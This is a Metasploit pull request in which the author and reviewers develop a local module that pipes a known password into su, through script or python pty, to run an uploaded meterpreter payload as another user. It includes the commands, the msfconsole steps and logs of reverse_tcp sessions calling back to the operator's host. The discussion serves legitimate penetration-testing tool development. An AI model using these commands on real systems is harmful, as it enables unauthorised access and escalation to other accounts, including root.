Add Login to User with Su on Linux / Unix Systems
rapid7/metasploit-framework pull request #14179
Opened 2020-09-24 06:44 UTC by youkergav

## About
  This change adds a new module to `modules/exploits/linux/local` that spawns a new sessions by invoking su with valid 
  credentials. The change also adds documentation for this module.

  This module attempts to create a new login session by invoking the su command of a valid username and 
  password. If the login is sucessful, a new session is created via the specified payload. While this 
  functionality can be reproduced by a TTY shell, a hacker might want to switch users with a meterpreter 
  session, or simply have all of their shells managed in one place.

  The su command is used in Linux and Unix environments to change to another user in linux. We can use this
  command to launch our payload as another user by running `su - [username] -c [payload]`. However, because
  you cannot pass in the password into su directly, we have to get a little more crafty. By running a command
  in sh, we can pipe the output to our su command (kind of) by using the following command:
  `sh -c 'sleep 1; echo [password]' | script /dev/null -qc 'su - [username] -c [payload]'`.

  Working example: `sh -c 'sleep 1; echo lamepassword' | script /dev/null -qc 'su - admin -c /tmp/shell'`

## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Get valid target username and password
  4. Do: `use exploit/linux/local/su_login`
  5. Do: `set SESSION [SESSION]`
  6. Do: `set USERNAME [USERNAME]`
  7. Do: `set PASSWORD [PASSWORD]`
  8. Do: `set PAYLOAD linux/x86/meterpreter/reverse_tcp`
  9. Do: `set LHOST [LHOST]`
  10. Do: `set LPORT [LPORT]`
  11. Do: `run`
  12. You should get a new session as the specified user

## Options

  | Name     | Description                                         |
  |----------|-----------------------------------------------------|
  | SESSION  | Which session to use, can be viewed with `sessions` |
  | USERNAME | The username of the user to switch to               |
  | PASSWORD | The password of the user to switch to               |

## Scenarios

  ```
  msf > use exploit/linux/local/su_login 
  msf exploit(linux/local/su_login) > set SESSION 1
  msf exploit(linux/local/su_login) > set USERNAME admin
  msf exploit(linux/local/su_login) > set PASSWORD lamepassword
  msf exploit(linux/local/su_login) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
  msf exploit(linux/local/su_login) > set LHOST 192.168.3.193
  msf exploit(linux/local/su_login) > set LPORT 4445
  msf exploit(linux/local/su_login) > run

  [*] Started reverse TCP handler on 192.168.3.193:4445 
  [*] Uploading payload to target
  [*] Attempting to login with su
  [*] Sending stage (976712 bytes) to 172.17.0.2
  [*] Meterpreter session 2 opened (192.168.3.193:4445 -> 172.17.0.2:39868) at 2020-09-23 04:26:49 -0400

  meterpreter > getuid
  Server username: admin @ 59f089909a39 (uid=1001, gid=1001, euid=1001, egid=1001)
  ```

2020-09-24 10:20 UTC, cdelafuente-r7 requested changes
Hi @youkergav, thanks for this module! This a great first contribution! I just left a few suggestions for you to review when you get a chance.

2020-09-24 10:20 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/su_login.rb
> +        return false
The recommended way to do this in ruby is:
```suggestion
        get_users.any? { |user| user[:name] == username }
```

2020-09-24 10:20 UTC, cdelafuente-r7 commented on documentation/modules/exploit/linux/local/su_login.md
> +  | PASSWORD | The password of the user to switch to               |
List each option specific to this module (`SESSION` is common to every post module and should not be listed here) and how to use it (see the documentation [template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md#options)):
```suggestion
  ### USERNAME
  The username of the user to switch to
  
  ### PASSWORD
  The password of the user to switch to
```

2020-09-24 14:18 UTC, acammack-r7 commented on modules/exploits/linux/local/su_login.rb
> +        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
In some cases `/tmp` will be mounted with `noexec` and all users will be unable to execute files located there. I think the writable execution directory should be an advanced option that defaults to `/tmp` and we should check the response for errors like the file was unable to be executed.

2020-09-24 16:46 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
There's a `noexec?` method to check if a directory is mounted `noexec`.

```
# grep -rni "def noexec" lib/msf/core/post/linux/system.rb  -A 10
259:  def noexec?(file_path)
260-    mount = cmd_exec('cat /proc/mounts').to_s
261-    mount_path = get_mount_path(file_path)
262-    mount.lines.each do |l|
263-      return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
264-    end
265-    false
266-  rescue
267-    raise 'Unable to check for noexec volume'
268-  end
269-
```

2020-09-24 16:49 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
`script` may not exist or may not be in path.

It may be useful to check `command_exists?('script')` prior to attempting exploitation.

Python is also a viable option:

```python
import pexpect
child = pexpect.spawn('su root')
child.expect ('Password:')
child.sendline('mypassword')
child.expect('\$')
child.sendline('id')
```

2020-09-25 04:05 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        fail_with(Failure::NoAccess, "username not found") if not user_exists(datastore["USERNAME"]) # Check if use exists
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:06 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +            return false
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:06 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        return false
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:06 UTC, youkergav commented on documentation/modules/exploit/linux/local/su_login.md
> +  | PASSWORD | The password of the user to switch to               |
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:07 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:11 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
Updated. Module now includes `PayloadFilepath` as an advanced option. 

Adding `noexec?` command returns `Exploit failed: NoMethodError undefined method `noexec?'`. Any ideas?

See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 04:16 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        cleanup_files([payload_file]) if result
Updated. Added `register_files_for_cleanup`. However, this is used after the payload is executed. Putting this in `build_payload` results in the error `Unable to delete [file]` when using payload `linux/x86/shell/reverse_tcp`.

See commit 17483f838e9c33851be2595ff0e10480f6b908ca

2020-09-25 06:01 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
> Updated. Module now includes `PayloadFilepath` as an advanced option.

The traditional option is `WritableDir` defaulting to `/tmp`.

```ruby
    register_advanced_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
```

> Adding `noexec?` command returns `Exploit failed: NoMethodError undefined method `noexec?'`. Any ideas?

The `noexec?` method is defined in the `Msf::Post::Linux::System` mixin.

```ruby
include Msf::Post::Linux::System
```

2020-09-25 06:03 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        fail_with(Failure::NotFound, "cannot find \"script\" command on target machine") unless command_exists?("script")
```suggestion
        fail_with(Failure::NotFound, 'cannot find "script" command on target machine') unless command_exists?('script')
```

2020-09-25 06:03 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +    def exploit()
```suggestion
    def exploit
```

2020-09-25 08:02 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
Fixed. See commit d45dfe865af82c07f0b2d5a9f989bf90d13824eb

2020-09-25 08:03 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        fail_with(Failure::NotFound, "cannot find \"script\" command on target machine") unless command_exists?("script")
Fixed. See commit d45dfe865af82c07f0b2d5a9f989bf90d13824eb

2020-09-25 08:03 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +    def exploit()
Fixed. See commit d45dfe865af82c07f0b2d5a9f989bf90d13824eb

2020-09-25 11:48 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +                "DisclosureDate" => "Sep 10 2020",
The disclosure date is usually the date the technique was discovered; or, in instances such as this where the functionality is intended functionality, the date should be the date the functionality was developed, which is:

```suggestion
                "DisclosureDate" => "1971-11-03",
```

2020-09-25 11:48 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        fail_with(Failure::NoAccess, "username not found") unless user_exists(datastore["USERNAME"])
It may be a good idea to check if `su` is executable before uploading the payload. One common `su` hardening configuration is to use the PAM `wheel` plugin. While this leaves `su` executable, more paranoid administrators will also remove the execute permission for everyone.

```ruby
fail_with(Failure::NoAccess, "/bin/su is not executable") unless executable?('/bin/su')
```

```
# grep -rn "executable?" lib/msf/core/post/file.rb  -A 3
183:  def executable?(path)
184:    raise "`executable?' method does not support Windows systems" if session.platform == 'windows'
185-
186-    cmd_exec("test -x '#{path}' && echo true").to_s.include? 'true'
187-  end
```

On the other hand, this presumes that `su` is located at `/bin/su` which may be an unsafe assumption. I'll mark this comment as resolved.

2020-09-25 11:48 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
The approach taken by `escape_chars` is error prone, as demonstrated by:

```
$ sh -c 'sleep 1; echo a&b'
sh: 1: b: not found
a
$ sh -c 'sleep 1; echo a;b'
a
sh: 1: b: not found
$ sh -c 'sleep 1; echo a'b'
> 
```

There are probably other control characters which may pose an issue. Using an encoder would resolve this.

The lazy approach is base64 encoding. I haven't tried, but perhaps something like this would work:

```suggestion
        b64_password = Rex::Text.encode_base64(password)
        command = "sh -c 'sleep 1; echo #{b64_password} | base64 -d' | script /dev/null -qc 'su - #{username} -c #{payload}'"
```

2020-09-25 13:58 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/su_login.rb
> +        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
`encoded_exe` will automatically [select](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/encoded_payload.rb#L387) which executable architecture the payload will need to be converted to. When no specific option is passed to the method, this is done based on the target architecture, the top level module architecture or the payload architecture (in that order). Since this module has no specific targets, it will choose between the top level values and pick `ARCH_X86` by default:
```ruby
"Arch"           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
```
This will obviously cause an issue when the target architecture is not x86.

One option would be to set one target per architecture. Note that you can also include a specific default payload for each target:
```ruby
                'Targets'        => [
                  [ 'Linux x86',        {
                    'Arch' => ARCH_X86,
                    "DefaultOptions" => { "PAYLOAD" => "linux/x86/meterpreter/reverse_tcp" },
                    }
                  ],
                  [ 'Linux x86_64',     {
                    'Arch' => ARCH_X64,
                    "DefaultOptions" => { "PAYLOAD" => "linux/x64/meterpreter/reverse_tcp" },
                    }
                  ],
                  [...]
```

Another option would be to pass the specific target to `encoded_exe` based on the host architecture. You will need to implement a logic to retrieve it (maybe with `session.arch` if it is a meterpreter session or `cmd_exec('uname -m')` for a shell session). Something along these lines:
```ruby
        host_arch = session.arch
        host_arch ||= case(cmd_exec('uname -m'))
                      when 'x86_64'
                        ARCH_X64
                      when 'x86'
                        ARCH_X86
                      when ...
                        ...
                      end
        payload_file = build_payload(payload.encoded_exe(arch: host_arch), datastore["WritableDir"])
```

2020-09-25 14:26 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/su_login.rb
> +        cleanup_files([payload_file]) if result
Strange, I tested and it worked for me. I added this right after the call to `chmod(filepath, 0755)` in `build_payload`:
```ruby
        register_files_for_cleanup(filepath)
```

2020-09-25 18:33 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/su_login.rb
> +    include Msf::Post::Linux
Please, can you run `rubocop` against your ruby file? It looks like there is an indentation problem:
```
rubocop -a modules/exploits/linux/local/su_login.rb
```

2020-09-25 21:35 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
The typical approach used by most local exploit modules is to use `generate_payload_exe`.

```suggestion
        payload_file = build_payload(generate_payload_exe, datastore["WritableDir"])
```

This has a similar issue, in that it defaults to `ARCH_X86` by default, but is a code pattern more consistent with existing modules. This becomes a non-issue if the user selects an appropriate `payload`.

2020-09-26 04:00 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        cleanup_files([payload_file]) if result
Marking as resolved as file will get cleaned up.

2020-09-26 04:00 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +                "DisclosureDate" => "Sep 10 2020",
Fixed. See commit 38fb6441696662d9aea17d95c8bc30021e002088

2020-09-26 04:01 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
Fixed. See commit 38fb6441696662d9aea17d95c8bc30021e002088

2020-09-26 04:01 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +    include Msf::Post::Linux
Fixed. See commit 38fb6441696662d9aea17d95c8bc30021e002088

2020-09-28 09:14 UTC, cdelafuente-r7 approved these changes

2020-09-28 09:16 UTC, cdelafuente-r7 commented on modules/exploits/linux/local/su_login.rb
> +        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
Thanks for adding the targets, it looks good to me. I agree with @bcoles, `generate_payload_exe` would be more consistent with existing module.

2020-09-28 16:43 UTC, acammack-r7 reviewed
Changes look good though I haven't had a chance to test, thanks!

2020-09-29 05:29 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
Fixed. See commit 38fb6441696662d9aea17d95c8bc30021e002088

2020-09-29 05:51 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        payload_file = build_payload(payload.encoded_exe, datastore["WritableDir"])
Replaced `payload.encoded_exe` with `generate_payload_exe`. See commit 9cf07e499fbf85f443b3a184b5356906f6be5376

2020-09-30 15:45 UTC, bwatters-r7 commented
Hi there; Thanks for your submission!  

Unfortunately, I was testing this today and could not get it to work.  For testing, I am using a CentOS x64 7.6.1810:
```
[msfuser@localhost ~]$ uname -a
Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

For my testing strategy, I am creating a new user and assigning a password to the new user called `testuser` with a password `v3Mpassword`.

I did add a quick debug print to get the command the mosule attempts to run on, but nothing else.
```
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser @ localhost.localdomain (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(linux/local/su_login) > use exploit/linux/local/su_login 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/su_login) > show options

Module options (exploit/linux/local/su_login):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  v3Mpassword     yes       Password to authenticate with.
   SESSION   3                yes       The session to run this module on.
   USERNAME  testuser         yes       Username to authenticate with.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  5678             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64


msf6 exploit(linux/local/su_login) > set session 4
session => 4
msf6 exploit(linux/local/su_login) > run

[*] Started reverse TCP handler on 192.168.135.197:5678 
[*] Uploading payload to target
[*] Attempting to login with su
[*] Running:
 sh -c 'sleep 1; echo djNNcGFzc3dvcmQ= | base64 -d' | script /dev/null -qc 'su - testuser -c /tmp/VOREgNCJ'
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/su_login) > [*] 192.168.134.103 - Meterpreter session 4 closed.  Reason: Died
```

It fails and I lose the original session.  

After some further testing, there's something wonky happening in the command pipe.  I added a quick debug print to get the command as it should be run, and I started to see if I could run that command in a regular shell.  When I do, it, I get an authentication failure:
```
[msfuser@localhost ~]$ sh -c 'sleep 1; echo djNNcGFzc3dvcmQ= | base64 -d' | script /dev/null -qc 'su - testuser -c /tmp/VOREgNCJ'
Password: 
[msfuser@localhost ~]$ su: Authentication failure
```

When I remove the base 64 encoding, I get the same thing, so I doubt that is the problem:
```
[msfuser@localhost ~]$ sh -c 'sleep 1; echo v3Mpassword' | script /dev/null -qc 'su - testuser -c /tmp/VOREgNCJ'
Password: 
[msfuser@localhost ~]$ su: Authentication failure
```

When I remove the pipe to the new shell, it does work, but I had to enter the password manually at the password prompt (of course)
```
[msfuser@localhost ~]$ script /dev/null -qc 'su - testuser -c /tmp/VOREgNCJ'
Password: 
```
Console:
```
[*] Sending stage (3008420 bytes) to 192.168.134.103
[*] Meterpreter session 7 opened (192.168.135.197:5678 -> 192.168.134.103:35364) at 2020-09-30 10:38:21 -0500

msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: testuser @ localhost.localdomain (uid=1001, gid=1001, euid=1001, egid=1001)
meterpreter > 

```
It would seem that there's something a bit wonky when we pipe the password to the new shell.  I'm not a Linux command-line ninja, though, so it is not trivially apparent to me why it is not working.

2020-10-01 15:21 UTC, bwatters-r7 commented
This came up earlier today with @acammack-r7; IIRC he suggested that the fault may lie with `script /dev/null -qc` and suggested pursuing a python-based alternative and ttyclass.  I've not had a chance to dig into that to provide further insight, through.

2020-10-01 15:32 UTC, acammack-r7 commented
Yep, `pty.spawn` isn't quite as portable, but will definitely work: https://docs.python.org/3/library/pty.html#pty.spawn

2020-10-02 08:06 UTC, bcoles commented
> 
> 
> Yep, `pty.spawn` isn't quite as portable, but will definitely work: https://docs.python.org/3/library/pty.html#pty.spawn

https://github.com/rapid7/metasploit-framework/pull/14179#discussion_r494466140

2020-10-02 08:39 UTC, youkergav commented
Hey guys, sorry for the late response...

Thanks for the assistance with this issue. I have been investigating this on my end extensively...

To start, I went with your recommendation and tried a Python implementation of this concept. I modified my code to  `sh -c 'sleep 1; echo lamepassword' | python -c 'import pty; pty.spawn("./stager")'` (stager file contains `su - admin -c /tmp/meterpreter`). Unfortunately, this was producing the same issue. Maybe there's something worth looking into with some more assistance...

I downloaded CenOS 7 and was experiencing the same issue you had - the module fails and the original session would die. When running the bash commands outside of the module, I noticed it looked like the command was waiting for stdin. I decided to pipe the output to `/dev/null`, so the new command would be `sh -c 'sleep 1; echo lamepassword | base64 -d' | script /dev/null -qc 'su - admin -c /tmp/meterpreter' > /dev/null`. Running this inside the module fixed the crashing session issue! See commit 809584da68e71a4fdeec881063965718d14c950b. Unfortunately, I still have to deal with the handling of the password and "authentication error" issue.

Continuing with the investigation, I tried my module on CentOS 8, and the module ran successfully. This led me to believe that there was a versioning issue with one of the bash commands I was using. I discovered that CentOS 7 was running `script` from the package `util-linux 2.23.2` while CentOS 8 was running `script` from `util-linux 2.32.1`. To test my theory, I decided to build `util-linux 2.34` from source on CentOS 7. After quite some time, I was able to produce a working version of `util-linux 2.34`.  I updated my bash commands to use the new version of the `script` command with `sh -c 'sleep 1; echo lamepassword | base64 -d' | /usr/local/util_linux/2_34/bin/script /dev/null -qc 'su - admin -c /tmp/meterpreter' > /dev/null`. **Sure enough, this ran as expected. I tried this in my module and was able to get a successful shell as the new user!**

I am open to suggestions on where to go from here, but my thoughts are to have my script only run on targets with newer versions of `util-linux`. I can build more versions from source this weekend to determine what versions of `util-linux` work with my module. Though, it would be nice if we could get this working with older versions of `util-linux`. Thanks for all the help so far!

*PS: I apologize in advance for spelling mistakes here - I am very tired.*

2020-10-02 08:47 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
Thanks for the suggestion. Unfortunately, the `pexpect` Python library only exists on Python version 3, and I fear making Python 3 a dependency would limit the targets of my module. I did however, attempt to make a version of this with the `pty` module for Python 2. Unfortunately, this would not work correctly on CentOS 7 - resulting in authentication failure. Code: `sh -c 'sleep 1; echo lamepassword' | python -c 'import pty; pty.spawn("./stager")'`

2020-10-02 09:01 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +        command = "sh -c 'sleep 1; echo #{escape_chars(password)}' | script /dev/null -qc 'su - #{username} -c #{payload}'"
> Thanks for the suggestion. Unfortunately, the `pexpect` Python library only exists on Python version 3

There is a pexpect package for Python2. Whether it is installed by default is another issue.

> Unfortunately, this would not work correctly on CentOS 7 - resulting in authentication failure. Code: `sh -c 'sleep 1; echo lamepassword' | python -c 'import pty; pty.spawn("./stager")'`

The purpose of using `expect` is to hard code the password in the Python code, rather than pipe the password on the command line. So no, that approach won't work.

2020-10-02 19:30 UTC, bwatters-r7 commented
Wow!  Thanks for the quick and detailed reply; that helps a lot!  (Also, I make spelling errors when I'm wide awake, so I'm not going to judge anyone).

I won't get a chance to dig into this for a couple days, but I can try and check it out soon.

2020-10-05 07:43 UTC, youkergav commented
So after some testing over the weekend, I think I have a *better* understanding of what's going on...

I created a very simple Python script to try to simulate `su`. The purpose of this was to reveal any input problems, and see what `su` may be receiving as the password.
```python
password = raw_input("Password: ")
print("Password is '" + password + "'.")
```
Testing this using the latest version of `script` (version 2.34) ran successfully. However, when running this command with the `script` version installed in CentOS 7 (version 2.23.2), Python threw an `EOFError` (more on this error [here](https://docs.python.org/release/2.7.5/library/exceptions.html?highlight=eof#exceptions.EOFError)).
```bash
> # Script 2.34
> sh -c 'sleep 1; echo lamepassword' | /usr/local/util_linux/2_34/bin/script /dev/null -qc 'python test.py'
Password: lamepassword
Password is 'lamepassword'.

> # Script 2.23.2
> sh -c 'sleep 1; echo lamepassword' | script /dev/null -qc 'python test.py'
Traceback (most recent call last):
  File "test.py", line 1, in <module>
    password = raw_input("Password: ")
EOFError
```

After more testing, it became apparent that attempting to pipe any input into the `script` version 2.23.2 cause the pseudo-terminal to exit prematurely. Doing this in version 2.34 produces expected successful output.
```bash
> # Script 2.23.2
> echo 'Hello World!' | script /dev/null -c echo
Script started, file is /dev/null
Script done, file is /dev/null

> # Script 2.34
> echo 'Hello World!' | /usr/local/util_linux/2_34/bin/script /dev/null -c echo
Script started, file is /dev/null
Hello World!
Script done, file is /dev/null
```
I think this may be a bug in the `script` program in older versions. Though, I cannot be sure if this was a bug or by design.

To discover when this behavior changed, I download and build each version of `util-linux` from source. **I have determined that this issue is no longer present after version 2.5 and after.** 

Running `script -V` will return the version of `util-linux` installed. I am going to update my module to include a `check` function that make sure `script` is greater or equal to version 2.5.

Please let me know if this is an acceptable solution. Thanks!

2020-10-09 08:08 UTC, youkergav commented
Hi Again!

I've been making more progress on this, and have has some pretty significant updates.

I was able to get a working Python implementation of this with `pty.spawn`, as discussed about earlier. I have also built a `check` function that checks for `python`, `python3`, or `script 2.26+`. 

This is the best solution I could come up with. I've testing this on many OS's (including CentOS7) and successfully got shells. See commit 23c6c415eb48a3d854a44968260e9167a7005f96.

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +    end
You could use the `AutoCheck` mixin here instead.

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +    register_files_for_cleanup(payload_file)
The payload file should be registered for cleanup immediately after upload. Currently, there are multiple method calls between the upload and the registration for cleanup. In particular, the `exec_payload` method can `fail_with`, causing the module to return prematurely, leaving the payload on disk.

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +      vprint_error('One of the following programs must be installed on target: util-linx, python, python3')
```suggestion
      vprint_error('One of the following programs must be installed on target: util-linux, python, python3')
```

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +      unless version[0] >= 2 && version[1] >= 25
You can use `Gem::Version` for version comparison. This is cleaner and easier to read.

Note that you will need to `split('-')` the input strings as `Gem::Version` does not deal with `-` nicely.

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +      commands = ['su', 'sleep', 'echo', 'base64']
`su` is already checked above.

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +    fail_with(Failure::NoAccess, 'invalid password') if response.include? 'Authentication failure'
```suggestion
    fail_with(Failure::NoAccess, 'invalid password') if response.to_s.include?('Authentication failure')
```

2020-10-09 08:29 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
`root` might be a useful default value. I suspect this is the most likely use case.

```suggestion
      OptString.new('USERNAME', [true, 'Username to authenticate with.', 'root']),
```

2020-10-09 09:41 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +    register_files_for_cleanup(payload_file)
Fixed in commit 23c6c415eb48a3d854a44968260e9167a7005f96

2020-10-09 09:43 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +      commands = ['su', 'sleep', 'echo', 'base64']
This was a typo and meant to check for `sh`. Fixed in 583e77db602b85cc249e6b3803162c2dfe02c396

2020-10-09 10:03 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +      vprint_error('One of the following programs must be installed on target: util-linx, python, python3')
Fixed. See commit 5726db44d068ba5c9d0af783c91d992f3e66bfe5

2020-10-09 10:09 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +      unless version[0] >= 2 && version[1] >= 25
Fixed. See commit 5726db44d068ba5c9d0af783c91d992f3e66bfe5

2020-10-09 10:36 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
I like this idea! I also added the `PASSWORD` value optional. That way, if someone is root and wants to switch to another user, they might not need to provide a password (though, this use case in unlikely). See commit a59558f03c8e9036adbf8d93213b41f6112d850e

2020-10-09 10:37 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +    end
Might you be able to provide an example of how to use this mixin? I was a hard time understanding documentation and could not find any implementations of this.

2020-10-09 13:36 UTC, bwatters-r7 commented on modules/exploits/linux/local/su_login.rb
> +    end
It is relatively new, so most modules do not use it, but it is handy.  After the include statements, prepend `Msf::Exploit::Remote::AutoCheck`.  Then the `check` method of the module will be called automatically.
You can see this in https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb

2020-10-09 13:40 UTC, bcoles commented on modules/exploits/linux/local/su_login.rb
> +    end
Once the prepend statement has been added you can remove these three lines to call `check`. The `check` method is called automatically.

2020-10-09 23:47 UTC, youkergav commented on modules/exploits/linux/local/su_login.rb
> +    end
Thanks for the help. This has been applied in the most recent commit. See d623d850409968192615b4bc062009a9824a758f

2020-10-19 20:54 UTC, bwatters-r7 commented
Hi there!

Thanks for the updates, changes, and patience!  I've been busy with another project of late, but I've been keeping an eye on this, and I like the changes you made here!

CentOS:
```
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser @ localhost.localdomain (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(linux/local/su_login) > set session 2
session => 2
msf6 exploit(linux/local/su_login) > show options

Module options (exploit/linux/local/su_login):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  v3Mpassword      no        Password to authenticate with.
   SESSION   2                yes       The session to run this module on.
   USERNAME  testuser         yes       Username to authenticate with.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4545             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64


msf6 exploit(linux/local/su_login) > run

[*] Started reverse TCP handler on 192.168.135.197:4545 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Using 'python' to load exploit
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.134.103
[*] Meterpreter session 3 opened (192.168.135.197:4545 -> 192.168.134.103:34668) at 2020-10-19 15:17:21 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: testuser @ localhost.localdomain (uid=1001, gid=1001, euid=1001, egid=1001)

```

Ubuntu:
```
meterpreter > sysinfo
Computer     : 192.168.134.163
OS           : Ubuntu 18.04 (Linux 4.15.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser @ ubuntu64-1804 (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(linux/local/su_login) > set session 4
session => 4
msf6 exploit(linux/local/su_login) > show options

Module options (exploit/linux/local/su_login):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  v3Mpassword      no        Password to authenticate with.
   SESSION   4                yes       The session to run this module on.
   USERNAME  testuser         yes       Username to authenticate with.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
